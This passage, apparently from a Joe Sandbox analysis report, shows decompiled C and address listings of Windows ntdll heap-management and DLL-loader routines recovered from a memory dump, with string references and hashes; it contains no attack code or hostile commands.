                                                                                                            0x00000000
                                                                                                            0x010d236b
                                                                                                            0x0108aac0
                                                                                                            0x0108a94a
                                                                                                            0x0108a94a
                                                                                                            0x0108a94d
                                                                                                            0x0108a94d
                                                                                                            0x0108a950
                                                                                                            0x0108a954
                                                                                                            0x010d2376
                                                                                                            0x010d2380
                                                                                                            0x0108a95a
                                                                                                            0x0108a95a
                                                                                                            0x0108a95c
                                                                                                            0x0108a95f
                                                                                                            0x0108a961
                                                                                                            0x0108a961
                                                                                                            0x0108a967
                                                                                                            0x0108a96a
                                                                                                            0x0108a972
                                                                                                            0x0108aa02
                                                                                                            0x0108aa06
                                                                                                            0x0108aa10
                                                                                                            0x0108aa16
                                                                                                            0x0108aa16
                                                                                                            0x0108aa1b
                                                                                                            0x0108aa21
                                                                                                            0x0108aa24
                                                                                                            0x0108aa27
                                                                                                            0x0108aa29
                                                                                                            0x0108aa2c
                                                                                                            0x0108aa32
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108a978
                                                                                                            0x0108a978
                                                                                                            0x0108a97b
                                                                                                            0x0108a981
                                                                                                            0x0108a996
                                                                                                            0x0108a998
                                                                                                            0x0108a99f
                                                                                                            0x0108a9a2
                                                                                                            0x010d238a
                                                                                                            0x0108a9a8
                                                                                                            0x0108a9a8
                                                                                                            0x0108a9a8
                                                                                                            0x0108a9aa
                                                                                                            0x0108a9ad
                                                                                                            0x0108a9b0
                                                                                                            0x0108a9bb
                                                                                                            0x0108a9be
                                                                                                            0x0108a9c7
                                                                                                            0x0108a9c9
                                                                                                            0x0108a9c9
                                                                                                            0x0108a9cc
                                                                                                            0x0108a9d1
                                                                                                            0x0108aa6d
                                                                                                            0x0108aa70
                                                                                                            0x0108aa73
                                                                                                            0x0108aa75
                                                                                                            0x0108aa79
                                                                                                            0x0108aa7e
                                                                                                            0x0108aa82
                                                                                                            0x0108aa8f
                                                                                                            0x0108aa94
                                                                                                            0x0108aa96
                                                                                                            0x010d2392
                                                                                                            0x010d23a1
                                                                                                            0x010d23a1
                                                                                                            0x0108aa9c
                                                                                                            0x0108aa9f
                                                                                                            0x0108aaa2
                                                                                                            0x0108aaa2
                                                                                                            0x0108aaa8
                                                                                                            0x0108aaab
                                                                                                            0x0108aaaf
                                                                                                            0x00000000
                                                                                                            0x0108aab5
                                                                                                            0x00000000
                                                                                                            0x0108aab5
                                                                                                            0x0108a9d7
                                                                                                            0x0108a9d7
                                                                                                            0x0108a9da
                                                                                                            0x0108a9e0
                                                                                                            0x0108a9e3
                                                                                                            0x0108a9e6
                                                                                                            0x0108a9e9
                                                                                                            0x0108a9eb
                                                                                                            0x0108a9fd
                                                                                                            0x0108a9fd
                                                                                                            0x00000000
                                                                                                            0x0108a9eb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108a983
                                                                                                            0x0108a983
                                                                                                            0x0108a983
                                                                                                            0x0108a987
                                                                                                            0x0108a995
                                                                                                            0x0108a995
                                                                                                            0x0108a995
                                                                                                            0x0108a995
                                                                                                            0x0108a989
                                                                                                            0x0108a98e
                                                                                                            0x00000000
                                                                                                            0x0108a990
                                                                                                            0x00000000
                                                                                                            0x0108a990
                                                                                                            0x0108a98e
                                                                                                            0x00000000
                                                                                                            0x0108a983
                                                                                                            0x0108a972
                                                                                                            0x0108a90a
                                                                                                            0x0108aa34
                                                                                                            0x0108aa34
                                                                                                            0x0108aa40
                                                                                                            0x0108aa43
                                                                                                            0x0108aa46
                                                                                                            0x0108aa4d
                                                                                                            0x010d23ab
                                                                                                            0x010d23b2
                                                                                                            0x010d23b8
                                                                                                            0x010d23be
                                                                                                            0x010d23c3
                                                                                                            0x010d23c5
                                                                                                            0x010d23cb
                                                                                                            0x010d23d1
                                                                                                            0x010d23d5
                                                                                                            0x010d23f6
                                                                                                            0x010d23fb
                                                                                                            0x010d23d7
                                                                                                            0x010d23ec
                                                                                                            0x010d23f1
                                                                                                            0x010d2403
                                                                                                            0x010d2408
                                                                                                            0x010d2410
                                                                                                            0x010d2417
                                                                                                            0x010d2422
                                                                                                            0x010d2422
                                                                                                            0x010d2417
                                                                                                            0x010d23c5
                                                                                                            0x010d23b2
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            • HEAP: , xrefs: 010D22E6, 010D23F6
                                                                                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010D22F3
                                                                                                            • HEAP[%wZ]: , xrefs: 010D22D7, 010D23E7
                                                                                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 010D2403
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                            • API String ID: 0-1657114761
                                                                                                            • Opcode ID: 22b22bff0883075436cc38bc4a110a3199e2d152e3e0bb308a2e8632c9e2d905
                                                                                                            • Instruction ID: a01f4ed27ab1dc64695c61be3c2a331836d94727a73115ef016c938d618f7247
                                                                                                            • Opcode Fuzzy Hash: 22b22bff0883075436cc38bc4a110a3199e2d152e3e0bb308a2e8632c9e2d905
                                                                                                            • Instruction Fuzzy Hash: 2AD1C074B08606DFDB19DF68C4907BABBF1BF48300F1485AAD9D69BB42E734A941CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0108A229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E0108A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0108DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E010A9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0112A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E010A9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0106B150();
					} else {
						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0106B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E01087D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0112138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E01087D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E01087D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01121582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E01087D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E01087D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01121582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E010BD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                                                            0x0108a229
                                                                                                            0x0108a231
                                                                                                            0x0108a23f
                                                                                                            0x0108a242
                                                                                                            0x0108a244
                                                                                                            0x0108a24c
                                                                                                            0x0108a255
                                                                                                            0x0108a25a
                                                                                                            0x0108a25f
                                                                                                            0x010d1c76
                                                                                                            0x010d1c78
                                                                                                            0x010d1c7e
                                                                                                            0x010d1c7f
                                                                                                            0x010d1c81
                                                                                                            0x010d1c82
                                                                                                            0x010d1c84
                                                                                                            0x010d1c89
                                                                                                            0x010d1c8b
                                                                                                            0x010d1c9e
                                                                                                            0x010d1c9e
                                                                                                            0x010d1cab
                                                                                                            0x010d1cb2
                                                                                                            0x00000000
                                                                                                            0x010d1cb2
                                                                                                            0x010d1c8d
                                                                                                            0x010d1c92
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d1c94
                                                                                                            0x010d1c98
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d1c98
                                                                                                            0x0108a265
                                                                                                            0x0108a265
                                                                                                            0x0108a266
                                                                                                            0x0108a26f
                                                                                                            0x0108a270
                                                                                                            0x0108a276
                                                                                                            0x0108a277
                                                                                                            0x0108a279
                                                                                                            0x0108a27e
                                                                                                            0x0108a282
                                                                                                            0x010d1db5
                                                                                                            0x010d1dbb
                                                                                                            0x010d1dc1
                                                                                                            0x010d1dc5
                                                                                                            0x010d1de4
                                                                                                            0x010d1de9
                                                                                                            0x010d1dc7
                                                                                                            0x010d1ddc
                                                                                                            0x010d1de1
                                                                                                            0x010d1def
                                                                                                            0x010d1df3
                                                                                                            0x010d1df7
                                                                                                            0x010d1dfe
                                                                                                            0x010d1e06
                                                                                                            0x0108a302
                                                                                                            0x0108a308
                                                                                                            0x0108a308
                                                                                                            0x0108a288
                                                                                                            0x0108a28d
                                                                                                            0x0108a294
                                                                                                            0x010d1cc1
                                                                                                            0x0108a29a
                                                                                                            0x0108a29a
                                                                                                            0x0108a29a
                                                                                                            0x0108a29f
                                                                                                            0x010d1ccb
                                                                                                            0x010d1cd1
                                                                                                            0x010d1cd8
                                                                                                            0x010d1cea
                                                                                                            0x010d1cea
                                                                                                            0x010d1cd8
                                                                                                            0x0108a2a9
                                                                                                            0x0108a2af
                                                                                                            0x0108a2bc
                                                                                                            0x010d1cfd
                                                                                                            0x0108a2c2
                                                                                                            0x0108a2c2
                                                                                                            0x0108a2c2
                                                                                                            0x0108a2c7
                                                                                                            0x010d1d07
                                                                                                            0x010d1d0d
                                                                                                            0x010d1d14
                                                                                                            0x010d1d1f
                                                                                                            0x010d1d21
                                                                                                            0x010d1d2c
                                                                                                            0x010d1d2c
                                                                                                            0x010d1d2c
                                                                                                            0x010d1d47
                                                                                                            0x010d1d47
                                                                                                            0x010d1d14
                                                                                                            0x0108a2cd
                                                                                                            0x0108a2d2
                                                                                                            0x0108a2d9
                                                                                                            0x010d1d5a
                                                                                                            0x0108a2df
                                                                                                            0x0108a2df
                                                                                                            0x0108a2df
                                                                                                            0x0108a2e4
                                                                                                            0x010d1d69
                                                                                                            0x010d1d6b
                                                                                                            0x010d1d76
                                                                                                            0x010d1d76
                                                                                                            0x010d1d76
                                                                                                            0x010d1d91
                                                                                                            0x010d1d91
                                                                                                            0x0108a2ea
                                                                                                            0x0108a2f0
                                                                                                            0x0108a2f5
                                                                                                            0x010d1da8
                                                                                                            0x010d1dad
                                                                                                            0x010d1dad
                                                                                                            0x0108a2fd
                                                                                                            0x0108a300
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                            • API String ID: 2994545307-2586055223
                                                                                                            • Opcode ID: 1b515e1d28d682543c7e2285c6c7ec745057acbe0a03520d6d6ad858bfd80707
                                                                                                            • Instruction ID: 743edc50f85d29978699d3a421302344a90324dca92b3e8e1ea3b9419ae72b45
                                                                                                            • Opcode Fuzzy Hash: 1b515e1d28d682543c7e2285c6c7ec745057acbe0a03520d6d6ad858bfd80707
                                                                                                            • Instruction Fuzzy Hash: BE51D2722087819FD322EB68C844F6B7BE9EB80754F1904A9F9D58B292DB35D900CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01098E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 44%
                                                                                                            			E01098E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x115d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1158464; // 0x76c90110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1155780 & 0x00000003) != 0) {
							E010E5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1155780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E010AB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1157984; // 0xc02b08
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1158464; // 0x76c90110
					 *0x115b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01099B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1155780 & 0x00000005) != 0) {
						_push(_t49);
						E010E5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                            0x01098e0f
                                                                                                            0x01098e16
                                                                                                            0x01098e19
                                                                                                            0x01098e1b
                                                                                                            0x01098e21
                                                                                                            0x01098e7f
                                                                                                            0x01098e85
                                                                                                            0x010d9354
                                                                                                            0x010d936c
                                                                                                            0x010d9371
                                                                                                            0x010d937b
                                                                                                            0x010d9381
                                                                                                            0x010d9381
                                                                                                            0x010d937b
                                                                                                            0x01098e9d
                                                                                                            0x01098e9d
                                                                                                            0x01098e29
                                                                                                            0x01098e2c
                                                                                                            0x01098e38
                                                                                                            0x01098e3e
                                                                                                            0x01098e43
                                                                                                            0x01098eb5
                                                                                                            0x01098eb9
                                                                                                            0x010d92aa
                                                                                                            0x010d92af
                                                                                                            0x010d92e8
                                                                                                            0x010d92e8
                                                                                                            0x010d92af
                                                                                                            0x01098eb9
                                                                                                            0x01098e45
                                                                                                            0x01098e53
                                                                                                            0x01098e5b
                                                                                                            0x01098e5f
                                                                                                            0x01098e78
                                                                                                            0x01098e78
                                                                                                            0x01098e7d
                                                                                                            0x01098ec3
                                                                                                            0x01098ecd
                                                                                                            0x01098ed2
                                                                                                            0x01098ed2
                                                                                                            0x01098ec5
                                                                                                            0x01098ec5
                                                                                                            0x00000000
                                                                                                            0x01098e7d
                                                                                                            0x01098e67
                                                                                                            0x01098ea4
                                                                                                            0x010d931a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d9320
                                                                                                            0x01098ea4
                                                                                                            0x01098e70
                                                                                                            0x010d9325
                                                                                                            0x010d9340
                                                                                                            0x010d9345
                                                                                                            0x010d9345
                                                                                                            0x01098e76
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 010D932A
                                                                                                            • LdrpFindDllActivationContext, xrefs: 010D9331, 010D935D
                                                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 010D933B, 010D9367
                                                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 010D9357
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                            • API String ID: 0-3779518884
                                                                                                            • Opcode ID: 8e96282de75bdf25f475b98291c6ab45267d5096918dee1348ffc7a24b6590c0
                                                                                                            • Instruction ID: 7ca29f4f0bbaab2f40f98532534436c9a0903c75ad28569ebd6aafb780f1fb6c
                                                                                                            • Opcode Fuzzy Hash: 8e96282de75bdf25f475b98291c6ab45267d5096918dee1348ffc7a24b6590c0
                                                                                                            • Instruction Fuzzy Hash: B9411962A0031DDFEFB56A1DC8B8A797AE5BB02308F05C1BBE9D457291E7705C809381
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 011249A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                            • API String ID: 2994545307-336120773
                                                                                                            • Opcode ID: 22befa489922478f2894412f5264164e2bfe07e20dbb7981148c92f912a9f654
                                                                                                            • Instruction ID: f7f4f2f5850cf343b6d52f1cba982a73fb5313a82f6bac347128134b10ffe21f
                                                                                                            • Opcode Fuzzy Hash: 22befa489922478f2894412f5264164e2bfe07e20dbb7981148c92f912a9f654
                                                                                                            • Instruction Fuzzy Hash: CE3144B6200125FFD328DB99C885FAB77E8EF04A24F154069F586CF641E771A890CB69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010899BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E010899BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0111FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0112A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E010BD540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E0106B150();
										} else {
											E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E0106B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x1156378 = 1;
											asm("int3");
											 *0x1156378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E0108A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E0108A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E0108BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0112A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
